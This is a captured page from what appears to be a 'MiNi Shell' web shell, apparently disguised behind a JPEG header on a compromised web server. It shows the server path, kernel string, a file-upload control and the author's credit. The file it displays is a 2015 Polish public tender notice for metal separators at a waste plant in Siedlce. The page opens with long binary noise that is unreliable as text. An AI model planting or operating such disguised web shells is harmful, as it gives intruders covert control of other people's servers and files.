JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151229/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151229/355276-N-2015.html

<p class="kh_header"><b>Siedlce: Przetarg nieograniczony (dla kwoty poniżej 207 000 EURO) na dostawę i montaż separatorów do hali sortowni Zakładu Utylizacji Odpadów w Woli Suchożebrskiej, ul. Sokołowska 2.</b><br>
<b>Numer ogłoszenia: 355276 - 2015; data zamieszczenia: 29.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Utylizacji Odpadów Sp. z o.o. w Siedlcach , ul. Błonie 3, 08-110 Siedlce, woj. mazowieckie, tel. 025 6332522, faks 025 6332526.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zuo.siedlce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony (dla kwoty poniżej 207 000 EURO) na dostawę i montaż separatorów do hali sortowni Zakładu Utylizacji Odpadów w Woli Suchożebrskiej, ul. Sokołowska 2..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3. 1. Przedmiot zamówienia obejmuje dostawę wraz z kompletnym montażem i uruchomieniem nowych dwóch separatorów do hali sortowni Zakładu Utylizacji Odpadów w Woli Suchożebrskiej, ul. Sokołowska 2 tj. separatora elektromagnetycznego do metali żelaznych - szt. 1; separatora wiroprądowego do metali nieżelaznych - szt. 1.  3.1.1 Urządzenia należy wmontować w linię na odpady komunalne zmieszane, w odcinek linii wyprowadzającej frakcję ciężką z separatora powietrznego na zewnątrz hali. Wszystkie urządzenia muszą się zmieścić pomiędzy separatorem balistycznym a ścianą hali. Zamontowane urządzenia należy podłączyć do istniejącego układu sterowania linii do segregacji odpadów komunalnych zmieszanych. Sterowanie przenośnikiem zbierającym i odprowadzającym do kontenera/ boksu na frakcję ciężką spod separacji powietrznej i zamontowanymi dwoma separatorami oraz ewentualnymi urządzeniami towarzyszącymi ma się odbywać z komputera umieszczonego w  pomieszczeniu sterowni. Wykonawca w ramach modernizacji fragmentu linii dostarczy wszelkie konstrukcje  dodatkowe, dodatkowe elementy pod separatory oraz urządzenia towarzyszące umożliwiające techniczny montaż i późniejsza prawidłową eksploatację zestawu separatorów oraz transport wysortowanego metalu do podstawionych standardowych kontenerów. Schemat obecnie funkcjonującego ciągu na odpady komunalne zmieszane, przekrój E-E w załączeniu - zał. Nr 8 do SIWZ. Wykonawca poza tym na własny koszt dokonuje rozładunku separatorów, wstawienia we właściwe miejsca, niezbędnej przeróbki istniejących taśmociągów, doprowadzenia przewodów zasilających i sterujących (jeżeli nie będzie możliwości wpięcia się w istniejącą instalację), wynajęcia urządzeń dźwigowych. Wykonawca zapewnia zlecającemu szkolenie i dokumentację w języku polskim. 3.1.2. Schemat przekroju linii sortowniczej (przekrój E-E) ze wskazanym miejscem montażu separatora metali żelaznych oraz separatora metali nieżelaznych w załączeniu - zał. Nr 8 do SIWZ.3.1.3. Wykonawca zobowiązany jest do dokonania odpowiednich modyfikacji linii technologicznej w przekroju E-E umożliwiających zainstalowanie separatora do metali żelaznych i separatora do metali nieżelaznych oraz wpięcie ich do obecnego układu sterowania. Automatyka i elektryka należy do Wykonawcy. 3.1.4. Wykonawca musi dobrać parametry urządzeń w taki sposób aby pracowały bez zakłóceń podczas  bieżącej pracy linii. Parametry separatorów muszą umożliwić pracę linii na odpady zmieszane w pełnym zakresie prędkości linii. Przepustowość roczna dla ciągu technologicznego na odpady zmieszane to 50.000 Mg/rok, dzienne ok 200 Mg tj. ok 14 Mg/h. Przybliżona gęstość odpadów frakcji ciężkiej 120kg/m3. Praca linii w systemie dwuzmianowym. 3.1.5. Przed przystąpieniem do złożenia oferty zaleca się aby Wykonawca dokonał wizji lokalnej istniejącego obiektu, układu linii na odpady komunalne zmieszane- Sortowni odpadów - po uprzednim umówieniu terminu z Zamawiającym w dni robocze w godzinach od 7.00 do 15.00. Na wniosek potencjalnego Wykonawcy, Zamawiający udostępni dokumentację techniczno-powykonawczą na linię obecnie pracującą. 3.1.6. Wybrany Wykonawca dostarczy do Zamawiającego w ciągu 7 dni od podpisania umowy, szczegółowy projekt sposobu zamontowania separatorów w celu akceptacji przez Zamawiającego przed wykonaniem.3.2. Szczegółowe parametry i wymagania stawiane przez Zamawiającego:1. Separator elektromagnetyczny nadtaśmowy do metali żelaznych:- urządzenie fabrycznie nowe;- separator winien być zawieszony poprzecznie nad przenośnikiem o szerokości 1000 mm;- prędkość taśmy wyrzutnikowej min. 2,1 m/s;- separator o niskim zużyciu energii, max. 6,1kW;- moc elektromagnesu: 2,7 - 3,1 kW; - moc napędu: około 3 kW; - taśma wyposażona w dwa rodzaje progów: o wysokości 50mm i 25mm;- separator wyposażony w cewki rozmieszczone w sposób piętrowy w celu pokrycia całej powierzchni przenośnika polem elektromagnetycznym;-  cewki  prostokątne, wykonane z taśmy aluminiowej anodowanej po docięciu, bandażowanej i epoksydowanej;- wymiary maksymalne separatora ze względu na lokalizację (przekrój E-E - zał.8 do SIWZ): długość 1990 mm, max. szerokość 1370 mm, max. wysokość 760 mm;- separator powinien zostać tak posadowiony aby była możliwość jego płynnej regulacji.- skuteczność separacji: min. 85%.II. Separator wiroprądowy do metali nieżelaznych - urządzenie fabrycznie nowe, umieszczony w ciągu linii w przekroju E-E - zał. Nr 8 do SIWZ- moc napędu wirnika: 1,8 - 2,2 kW;- moc napędu taśmy: min. 1,5 kW- wydajność:  2,5Mg/h, zakładając że waga 1m3 odpadów to około 120kg- szerokość robocza: max. 1000 mm przy szerokości całkowitej taśmy: max. 1130 mm;- rodzaj magnesów: NdFeB- taśma wykonana z PU- pokrycie wirnika wykonane z wzmocnionego włókna szklanego;- separator z wysoką skutecznością separacji;- wirnik posiada system magnesów zbudowany z max. 5 par biegunowych magnesów typu NdFeB;- wirnik zabudowany w układzie mimośrodowym;- prędkość taśmy separatora regulowana falownikiem, z zakresem prędkości do 1,5 m/s - wymiary separatora ze względu na lokalizacje bez przedziału separującego :max. długość 2570 mm, max. szerokość 1400 mm, max. wysokość 760 mm;- skuteczność separacji: min. 80%.III. Nowe urządzenia należy połączyć z istniejącym systemem sterowania linii do sortowania odpadów i je zsynchronizować oraz przeprowadzić testy poprawnej pracy całej linii na odpady komunalne zmieszane. Dostawa, montaż i uruchomienie separatorów - metali żelaznych i nieżelaznych -. Ze względu na wykonywane prace na czynnym obiekcie istnieje konieczność pracy Wykonawcy w weekendy oraz w nocy  po wcześniejszym ustaleniu z Zamawiającym.3.3. Wykonawca udziela Zamawiającemu gwarancji na kompletny przedmiot umowy na okres 24 miesiące od daty podpisania protokołu odbioru końcowego. Gwarancja obejmować będzie wady materiałowe oraz wady w instalacji urządzeń. W wyniku wprowadzenia zmian w aktualnie pracujących przenośnikach Wykonawca udziela zamawiającemu 24 m-cznej gwarancji na zmodyfikowane przenośniki oraz na zmodyfikowane systemy elektroniki i automatyki. 3.4. Projekt technologiczny i konstrukcyjny powykonawczy zamienny w przekroju E-E linii,  projekt elektryczny powykonawczy, projekt automatyki powykonawczy - Wykonawca przekaże najpóźniej w dniu odbioru przedmiotu umowy Zamawiającemu. Dokumenty urządzeń (Dokumentacja techniczno - ruchowa z instrukcją obsługi, książki gwarancyjne, deklaracje zgodności CE) sporządzone  w języku polskim najpóźniej w dniu odbioru przedmiotu umowy Zamawiającemu. 2 egzemplarze dokumentacji w wersji papierowej i jeden egzemplarz dokumentacji w wersji elektronicznej.3.5. Transport, rozładunek, montaż urządzenia i podłączenie do obecnie funkcjonujących układów  (automatyka i elektryka, układ bezpieczeństwa) w sortowni odpadów na koszt Wykonawcy.3.6. Miejsce dostawy i zabudowy przedmiotu zamówienia loco Zakład w Woli Suchożebrskiej, 08-125 Suchożebry, ul. Sokołowska 2.3.7. Jednodniowe szkolenie przez Wykonawcę (min.8-godzin) personelu wskazanego przez Zamawiającego na koszt Wykonawcy.3.8. Odbiór separatorów nastąpi przez Zamawiającego poprzez podpisanie protokołu odbioru końcowego, czyli po dostarczeniu, montażu i sprawdzeniu prawidłowej pracy kompletnego przedmiotu umowy. po przeszkoleniu personelu.3..9. Warunki płatności: przelewem w ciągu 21 dni od daty otrzymania przez Zamawiającego faktury na wskazane konto Wykonawcy. Wystawienie faktury nastąpi po podpisaniu protokołu odbioru końcowego kompletnego przedmiotu umowy (bez uwag) przez Wykonawcę i Zamawiającego. 3.10. Zamawiający nie dopuszcza dostawy urządzeń będących prototypami..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 42.99.00.00-2, 51.50.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 9.1. Zamawiający przewiduje wnoszenie wadium.9.2. Ustala się wadium w wysokości 10 000 (dziesięć tysięcy złotych).9.3. Wadium można wnosić w formie przewidzianej w art. 45 ust. 6 ustawy Prawo Zamówień Publicznych.9.4. Wadium wnoszone w pieniądzu należy wpłacić na rachunek Zamawiającego: Kredyt Bank SA oddział Siedlce nr 61 1500 1663 1216 6002 8103 0000.9.5. Zwrot wadium następuje na zasadach określonych w art. 46 ustawy Prawo Zamówień Publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Formularz ofertowy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Formularz ofertowy. 2. Dokument nr 4:Wykaz należycie wykonanych dostaw w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dostaw odpowiadającym swoim rodzajem i wartością dostawie będącej przedmiotem zamówienia (co najmniej 1 dostawa separatora metali żelaznych i 1 dostawa separatora metali nieżelaznych), na które Wykonawca posiada dokumenty potwierdzające, że dostawy zostały wykonane należycie z podaniem:- wartości, - przedmiotu, - dat wykonania - odbiorców. 3. Dokument nr 5Dokumenty potwierdzające, że dostawy objęte wykazem określonym w dokumencie nr 4 zostały wykonane należycie (co najmniej jeden).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Formularz ofertowy. 2. Opłacona polisa, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę 300.000,00 zł lub powyżej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokument nr.9. Opis oferowanych urządzeń, potwierdzający spełnienie parametrów określonych w pkt 3.SIWZ. 2. Dokument nr. 10 Dokument wystawiany przez producenta separatorów albo jego upoważnionego przedstawiciela, stanowiący wiążące prawnie przyrzeczenie stwierdzające zgodność wyrobu z wymaganiami zasadniczymi właściwych dyrektyw Unii Europejskiej np. certyfikat CE. 3. Dokument nr 7: potwierdzenie wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zuo.siedlce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekretariat ZUO Sp. z o.o., ul. Błonie 3, 08-110 Siedlce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.01.2016 godzina 10:00, miejsce: Sekretariat ZUO Sp. z o.o., ul. Błonie 3, 08-110 Siedlce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com